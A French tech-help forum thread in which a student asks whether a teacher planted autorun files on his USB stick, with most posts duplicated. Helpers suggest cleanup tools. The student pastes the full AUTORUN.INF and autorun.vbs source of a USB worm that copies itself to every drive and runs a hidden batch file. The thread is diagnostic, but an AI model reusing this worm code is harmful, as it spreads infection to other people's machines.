Mon prof cherche t-il a me m'infecter ?
Résolu
*anonyme*
Messages postés
20
Date d'inscription
Statut
Membre
Dernière intervention
-
nasroo7 Messages postés 137 Date d'inscription Statut Membre Dernière intervention -
nasroo7 Messages postés 137 Date d'inscription Statut Membre Dernière intervention -
Bonjour,
Il y a pas longtemps j'ai passé ma clef usb a un prof de mon lycée, il en avait besoin pour copier des fichier.
J'étais juste a coté de lui, il insère la clef dans son portable et commence a rentrer des infos en mode console sous linux (je ne sais pas quel version). Mon dossier fesait 36 MB environ par enorme quoi et le prof a environ mit 2-3 minutes pour tout mettre sur son portable.
bon j'ai vu qu'il a fait quelques commande comme mount ect... normal quoi, j'ai pas tout suivi.
Bon après je me retrouve avec des fichiers nommé:
autorun.bat (avec un cadenas a coté sous ubuntu donc lecture seule)
autorun.bin
autorun.reg
autorun.txt (fichier executable quand même !)
autorun.vbs (oh le noob il code en vb)
autorun.wsh
AUTORUN.INF
Je change de post pour imprimer un document (se trouvant sur ma clef usb), je demare windows car j'ai quelques pb d'encodage avec open office.
Je recoit directement un high risk message de norton (pas frappé pour norton) qui m'indique qu'il s'agit d'un virus.
Si vous voulez/ me permettez je peux copier une partie des sources codes et vous les donnez. Le meme jour j'avais aussi inseré ma clef dans le pc du cdi donc pas évident pour savoir d'ou viennent ces fichiers. Si quelqu'un connait une astuce qui permet de retrouver l'heure d'enregistrement des fichiers sur ma clef je suis preneur.
Donc voila mon histoire. Qu'en pensez vous ? Des virus ? Infection volentaire ? Que faire maintenant ?
Merci d'avance pour votre aide et vos conseils.
Il y a pas longtemps j'ai passé ma clef usb a un prof de mon lycée, il en avait besoin pour copier des fichier.
J'étais juste a coté de lui, il insère la clef dans son portable et commence a rentrer des infos en mode console sous linux (je ne sais pas quel version). Mon dossier fesait 36 MB environ par enorme quoi et le prof a environ mit 2-3 minutes pour tout mettre sur son portable.
bon j'ai vu qu'il a fait quelques commande comme mount ect... normal quoi, j'ai pas tout suivi.
Bon après je me retrouve avec des fichiers nommé:
autorun.bat (avec un cadenas a coté sous ubuntu donc lecture seule)
autorun.bin
autorun.reg
autorun.txt (fichier executable quand même !)
autorun.vbs (oh le noob il code en vb)
autorun.wsh
AUTORUN.INF
Je change de post pour imprimer un document (se trouvant sur ma clef usb), je demare windows car j'ai quelques pb d'encodage avec open office.
Je recoit directement un high risk message de norton (pas frappé pour norton) qui m'indique qu'il s'agit d'un virus.
Si vous voulez/ me permettez je peux copier une partie des sources codes et vous les donnez. Le meme jour j'avais aussi inseré ma clef dans le pc du cdi donc pas évident pour savoir d'ou viennent ces fichiers. Si quelqu'un connait une astuce qui permet de retrouver l'heure d'enregistrement des fichiers sur ma clef je suis preneur.
Donc voila mon histoire. Qu'en pensez vous ? Des virus ? Infection volentaire ? Que faire maintenant ?
Merci d'avance pour votre aide et vos conseils.
A voir également:
- Mon prof cherche t-il a me m'infecter ?
- Prof qui rabaisse les élèves loi - Forum Études / Formation High-Tech
- Adieu monsieur le prof musique sans paroles - Forum Audio
- Chanson pour remercier un prof ✓ - Forum Musique / Radio / Clip
- Fleurs d'encre 5e livre du prof pdf gratuit ✓ - Forum PDF
- Chanson pour une personne spéciale ✓ - Forum Musique / Radio / Clip
16 réponses
Salut,
Tu dois normalement avoir une chaîne d'alerte dans ton établissement scolaire et un responsable du réseau informatique. Préviens-le du poste infecté.
Il y a en effet un ver qui se propage par support amovible, et quand on connait le nombre de postes et le nombre d'utilisateurs possédant potentiellement des clés USB, on peut sans peine imaginer les problèmes de sécurité que ça peut poser dans un établissement scolaire.
1/ # Télécharge RavAntivirus d'Evosla : http://ww25.evosla.com/compteur.php?soft=rav_antivirus
# Si tu as une clé USB, disque dur externe, etc, branche-les sans les ouvrir avant de lancer ce FIX
# Fais un clic droit sur le fichier .ZIP > Extraire sur > le Bureau
# Doucle-clique sur >> RAV.exe << afin de lancer l'outil.
# Une fois RAV ANTIVIRUS lancé, laisse-le réagir , il scanne automatiquement tout les lecteurs (disques fixes et amovibles)
# Si infection > un log s'établira, sinon le soft affichera (très rapide) ==>Votre Ordinateur est sain .
# Retire tes disques amovibles et redémarrez votre ordinateur.
# Poste le rapport, si infection!
2/ Télécharge sur le bureau Flash Disinfector (de SUBS) à cette adresse : http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe
https://download.bleepingcomputer.com/sUBs/Flash_Disinfector.exe
Double-clique sur l’icône.
Les icônes vont disparaître. C’est normal.
Si un rapport est généré en cas d'infection, sauvegarde-le sur le bureau.
Redémarre ensuite le PC.
3/ edite aussi un rapport Hijackthis : http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe
Démo en image
http://perso.orange.fr/rginformatique/section%20virus/demohijack.htm
Fais un scan et poste l'analyse.
FillPCA
Tu dois normalement avoir une chaîne d'alerte dans ton établissement scolaire et un responsable du réseau informatique. Préviens-le du poste infecté.
Il y a en effet un ver qui se propage par support amovible, et quand on connait le nombre de postes et le nombre d'utilisateurs possédant potentiellement des clés USB, on peut sans peine imaginer les problèmes de sécurité que ça peut poser dans un établissement scolaire.
1/ # Télécharge RavAntivirus d'Evosla : http://ww25.evosla.com/compteur.php?soft=rav_antivirus
# Si tu as une clé USB, disque dur externe, etc, branche-les sans les ouvrir avant de lancer ce FIX
# Fais un clic droit sur le fichier .ZIP > Extraire sur > le Bureau
# Doucle-clique sur >> RAV.exe << afin de lancer l'outil.
# Une fois RAV ANTIVIRUS lancé, laisse-le réagir , il scanne automatiquement tout les lecteurs (disques fixes et amovibles)
# Si infection > un log s'établira, sinon le soft affichera (très rapide) ==>Votre Ordinateur est sain .
# Retire tes disques amovibles et redémarrez votre ordinateur.
# Poste le rapport, si infection!
2/ Télécharge sur le bureau Flash Disinfector (de SUBS) à cette adresse : http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe
https://download.bleepingcomputer.com/sUBs/Flash_Disinfector.exe
Double-clique sur l’icône.
Les icônes vont disparaître. C’est normal.
Si un rapport est généré en cas d'infection, sauvegarde-le sur le bureau.
Redémarre ensuite le PC.
3/ edite aussi un rapport Hijackthis : http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe
Démo en image
http://perso.orange.fr/rginformatique/section%20virus/demohijack.htm
Fais un scan et poste l'analyse.
FillPCA
bonsoir c'est pas des virus t'inkiete.
les txt c'est pas des executable c'est des fichiers textes
le vbs c'est du visual basic
le .reg ca concerne le registre
le bat c'est un fichier batch
donc un conseil ne les ouvre pas ca peut te mettre le souk sur ton ordi
pour les infos d'enregistrement clic droit dessus puis prorpiété
les txt c'est pas des executable c'est des fichiers textes
le vbs c'est du visual basic
le .reg ca concerne le registre
le bat c'est un fichier batch
donc un conseil ne les ouvre pas ca peut te mettre le souk sur ton ordi
pour les infos d'enregistrement clic droit dessus puis prorpiété
Salut,
Dans la bdd de norton il m'indique qu'il s'agit d'un ver. La dernière modification date de juin 2006, le ver est connu depuis 2007.
voici le code AUTORUN.INF:
autorun·ç±©
[autorun]
open=
shell\open=Žò¿ª(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=×ÊÔŽ¹ÜÀíÆ÷(&X)
shell\explore\Command=WScript.exe .\autorun.vbs
Bizarement le fichier .txt est reconnu comme un executable sous linux alors qu'il affiche bien l'extension .txt
voici le code de autorun.vbs:
rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if
if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
function decrypt(dcode)
dim texts
dim i
for i=1 to len(dcode)-4
x=i mod 5
texts=texts & chr(asc(mid(dcode,i,1))-x)
next
decrypt=texts
end function
Je remarque directement que la date indiqué est 2030, O_o.
Les fichier semble aussi inteargir entre eux, car ils en ouvrent d'autres.
Dans la bdd de norton il m'indique qu'il s'agit d'un ver. La dernière modification date de juin 2006, le ver est connu depuis 2007.
voici le code AUTORUN.INF:
autorun·ç±©
[autorun]
open=
shell\open=Žò¿ª(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=×ÊÔŽ¹ÜÀíÆ÷(&X)
shell\explore\Command=WScript.exe .\autorun.vbs
Bizarement le fichier .txt est reconnu comme un executable sous linux alors qu'il affiche bien l'extension .txt
voici le code de autorun.vbs:
rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if
if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
function decrypt(dcode)
dim texts
dim i
for i=1 to len(dcode)-4
x=i mod 5
texts=texts & chr(asc(mid(dcode,i,1))-x)
next
decrypt=texts
end function
Je remarque directement que la date indiqué est 2030, O_o.
Les fichier semble aussi inteargir entre eux, car ils en ouvrent d'autres.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
a priori ca y ressemble, mais je vois mal un prof faire ça ^^
de toute facon on est pas encore en 2030 ;-)
de toute facon on est pas encore en 2030 ;-)
Sous linux j'ai aucun aussi les autorun se n'active pas ;)
Sous windows norton les a bloqués donc je me considère comme non infecté, je suis juste "l'heureux" posseseur de ces fichiers.
Je sais pas de quoi mon prof est capable, mais il est majoritairement consideré comme bizarre.
Sous windows norton les a bloqués donc je me considère comme non infecté, je suis juste "l'heureux" posseseur de ces fichiers.
Je sais pas de quoi mon prof est capable, mais il est majoritairement consideré comme bizarre.
sous linux j'ai pas d'antivirus, j'en n'ai pas besoin ;)
sous windows norton ne me convient pas mais bon moi j'utilise windwos pour imprimer des fichiers et jouer des jeux videos, en general je retire mon cable ethernet comme pare feu :D
hmm ma clef n'est pas un système d'exploitation donc a priori elle n'est pas infecté elle est juste contagieuse pour les ordinateur exquipé de windows car "le pirate" exploite une faille de sécurité: l'autorun, donc si je met ma clef et qu'il n'y a pas d'antivirus qui detecte le ver et bien dans ce cas je suis perdu...
sous windows norton ne me convient pas mais bon moi j'utilise windwos pour imprimer des fichiers et jouer des jeux videos, en general je retire mon cable ethernet comme pare feu :D
hmm ma clef n'est pas un système d'exploitation donc a priori elle n'est pas infecté elle est juste contagieuse pour les ordinateur exquipé de windows car "le pirate" exploite une faille de sécurité: l'autorun, donc si je met ma clef et qu'il n'y a pas d'antivirus qui detecte le ver et bien dans ce cas je suis perdu...
slt,
je ne sais pas si c'est interdit de faire ça... (de detourner une discussion)
mais pouvez vous jeter un ptit coup d'oeil sur ce post SVP ?
http://www.commentcamarche.net/forum/affich 6090734 extraction de videos flash
mercii
je ne sais pas si c'est interdit de faire ça... (de detourner une discussion)
mais pouvez vous jeter un ptit coup d'oeil sur ce post SVP ?
http://www.commentcamarche.net/forum/affich 6090734 extraction de videos flash
mercii
Bon aparemment ma clef a ete infecté a 16heure 39 minutes et 53 secondes donc au cdi
j'ai utilisé la commande stat sous linux.
j'ai utilisé la commande stat sous linux.
j'ai un MP4 qui est bloqué... genre sa memoire est pleinne !
j'ai effacé pleins de chansons a partir de son menu, mais en le branchant sur le PC, rien y faire... aucun echange de données possible entre le PC et le MP4...
Peut etre qu'il est infecté aussi ? cette methode pourrait marcher ?
j'ai effacé pleins de chansons a partir de son menu, mais en le branchant sur le PC, rien y faire... aucun echange de données possible entre le PC et le MP4...
Peut etre qu'il est infecté aussi ? cette methode pourrait marcher ?
